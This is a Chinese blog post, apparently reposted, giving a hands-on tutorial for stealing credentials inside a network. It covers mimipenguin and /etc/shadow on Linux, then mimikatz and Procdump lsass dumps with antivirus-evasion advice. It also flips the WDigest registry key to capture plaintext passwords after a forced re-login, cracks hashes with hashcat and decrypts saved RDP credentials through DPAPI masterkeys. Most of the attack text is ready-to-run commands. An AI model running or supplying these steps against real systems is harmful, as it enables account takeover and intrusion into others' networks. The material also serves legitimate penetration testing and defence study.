内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp

这篇具有很好参考价值的文章主要介绍了内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

0x00 说明

微软为了防止明文密码泄露发布了补丁KB2871997,关闭了Wdigest功能。
当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
windows读取密码出现的情况
强开注册表,可以读取明文密码
直接破解密文

Linux-mimipenguin适用环境:
unbuntu12.04-16.04
Kali 4.3.0
VSFTPd 3.0.3-8+b1
Apache2 2.4.25-3
openssh-server 1:7.3p1-1

0x01Linux-密码获取&密文破解&ssh

1.mimipenguin密码读取:

chmod 755 ./mimipenguin.sh
./mimipenguin.sh

2.密码破解:

cat /etc/shadow
hashcat.exe -a 3 -m 1800 linuxhash.txt pass.txt

加密形式:

linux sha512crypt $6$, SHA512 (Unix)加密方式:
hashcat -m 1800 sha512linux.txt p.txt
linux sha256crypt $5$, SHA256 (Unix)加密方式:
hashcat -m 7400 sha256linux.txt p.txt
linux下md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)加密方式:
hashcat -m 500 linuxmd5.txt p.txt
inux下bcrypt $2*$, Blowfish加密方式:
hashcat -m 3200 linuxmd5.txt p.txt

3、密码存储:SSH密匙
获取id_rsa文件

ssh -i id_rsa root@172.16.250.30

0x02Windows在线离线读取&密文破解&存储凭证rdp

1.在线读

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"

低版本可以看到是能读取到明文密码
内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
高版本,可以看到是没有读取到密码的
内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp

2.离线读
-1.针对防护拦截(Mimikatz被拦截)
Procdump是微软官方的工具,杀软不会拦截,再用本地mimiakatz还原

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.DMP"
sekurlsa::logonPasswords full

-2.针对高版本但有存储(内存还有数据的,登录过并且内存中是有明文账号密码的,和域控通讯过,打开防火墙输入账号密码)

Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.DMP"
sekurlsa::logonPasswords full

内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp

3.解决高版本
修改注册表,需要重新登录输入用户名和密码才能获取明文密码
修改注册表+强制锁屏+等待系统管理员重新登录+截取明文密码
修改注册表来让Wdigest Auth保存明文口令方式

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

4、HASH破解
在线网站解密
-m 密文类型
-a 破解类型
?l 小写
?s 符号
?d 数字
518b98ad4178a53695dc997aa02d455c
字典破解:

hashcat.exe -a 0 -m 1000 hash.txt pass.txt

内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp

暴力破解:

hashcat.exe -a 3 -m 1000 518b98ad4178a53695dc997aa02d455c ?l?l?l?l?l?s?s?s?d?d

5.RDP凭据抓取
内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
勾选记住这个凭据才可以进行破解

查看连接记录:

cmdkey /list

内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
查找本地的Credentials:

dir /a %userprofile%\appdata\local\microsoft\credentials\*

内网渗透之linux&windows密码读取&haschcat破解&ssh&rdpCredentials记录guidMasterKey值

mimikatz dpapi::cred /in:C:\Users\webadmin\appdata\local\microsoft\credentials\5FBB2585F99BA05366F08E52F1C1740B

内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
找到guidMasterKey对应的MasterKey:

mimikatz sekurlsa::dpapi

内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp
解密指定的MasterKey凭据:

mimikatz dpapi::cred /in:C:\Users\webadmin\appdata\local\microsoft\credentials\5FBB2585F99BA05366F08E52F1C1740B
/masterkey:628996c19d2f13082930aef01e4f0d2d4643a59e46c37346782fdebfb470a3a509e7005bc2f19b4ed40e9fbf8083868183200e44eac7ecfd6e90ff5d3e12671c

内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp文章来源地址https://www.toymoban.com/news/detail-441901.html

到了这里,关于内网渗透之linux&windows密码读取&haschcat破解&ssh&rdp的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 渗透测试--5.3.使用john破解密码

    由于Linux是Internet最流行的服务器操作系统,因此它的安全性备受关注。这种安全主要靠口令实现。 Linux使用一个单向函数crypt()来加密用户口令。单向函数crypt()从数学原理上保证了从加密的密文得到加密前的明文是不可能的或是非常困难的。当用户登录系统时,系统并

    2024年02月13日
    浏览(38)
  • 1024渗透测试如何暴力破解其他人主机的密码(第十一课)

    crunch是一个密码生成器,一般用于在渗透测试中生成随机密码或者字典攻击。下面是常见的一些使用方法: 生成密码字典 生成6位数字的字典:crunch 6 6 -t @@@@@ -o dict.txt 生成12位包含数字和字母的字典:crunch 12 12 -t @@@@@@@@@@ -s ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -o dict.txt 生成所有可能

    2024年02月07日
    浏览(57)
  • Windows SSH远程连接Linux服务器 - 无公网IP内网穿透

    转发自CSDN远程穿透的文章:【vscode远程开发】使用SSH远程连接服务器 「内网穿透」 远程连接服务器工具有很多,比如XShell、putty等,可以通过ssh来远程连接服务器,但这用于写代码并不方便,可能需要现在本地写好代码后再将源代码传送到服务器运行、服务器上的图片也无

    2024年02月04日
    浏览(59)
  • 【VsCode远程开发】Windows SSH远程连接Linux服务器 - 无公网IP内网穿透

    转发自CSDN远程穿透的文章:【vscode远程开发】使用SSH远程连接服务器 「内网穿透」 远程连接服务器工具有很多,比如XShell、putty等,可以通过ssh来远程连接服务器,但这用于写代码并不方便,可能需要现在本地写好代码后再将源代码传送到服务器运行、服务器上的图片也无

    2024年02月02日
    浏览(88)
  • 渗透实战:dedeCMS任意用户密码重置到内网getshell

    ## 一、简介 DedeCMS 是一个基于 PHP 和 MySQL 的开源 CMS 系统,它是国内很多网站使用的 CMS 系统之一。在使用 DedeCMS 的过程中,我们需要重视其安全性,因为安全问题可能会导致网站数据泄露、网站被黑、系统被入侵等严重后果。本文将介绍如何进行 DedeCMS 安全测试。 1、环境准

    2024年02月06日
    浏览(41)
  • 内网渗透之横向移动wmi&smb&密码喷射CrackMapExec

    wmi可以通过hash或明文进行验证,不会在系统日志中留下痕迹,使用139端口 复现环境: god.org win2008 dc win2012sql win2008 web 准备: cs上线 win2008web 提权利用ms14-058 抓取hash和明文密码(当获取到其他主机就重复提权和抓取密码) 扫描存活主机,扫描端口 生成正向连接木马,上传至根

    2023年04月22日
    浏览(43)
  • 破解windows密码

    漏洞 在未登录系统是。连续按5次shift建,弹出程序c:windowssystem32sethc.exe 部分win7 及win10系统在为进入系统时,可以通过 系统修复漏洞 算改系统文件名 注:如win7或win10系统已修复漏洞2,则无法利用 破解过程相关命令 cmd工具路径:c:windowssystem32cmd 用户账号密码存储位置:

    2024年02月06日
    浏览(44)
  • Windows开机密码破解

    通过本文最后“本文参考网页”下载Rufus写盘工具和Hiren’s BootCD PE镜像 启动写盘工具,选择U盘和镜像 U盘插入电脑时确保电脑为关机状态 启动电脑,快速敲击Delete键,进入Bios界面 (不同的电脑是通过不同的按键进入BIOS,可以利用搜索引擎查看你的电脑进BIOS的方法。) 设置

    2024年02月07日
    浏览(44)
  • windows10下破解开机密码

    准备工具: 一台windows10测试机 mimikatz(猕猴桃破解工具)  1. 破解win10下当前账户的密码 原理是从内存中破解 打开任务管理器 详细信息-按ls找到名为lsass.exe的进程 右键 输入lsass搜索 把此文件复制到猕猴桃x64文件夹下 以管理员身份运行猕猴桃 输入以下三条命令: 到此步 NTLM是

    2023年04月08日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包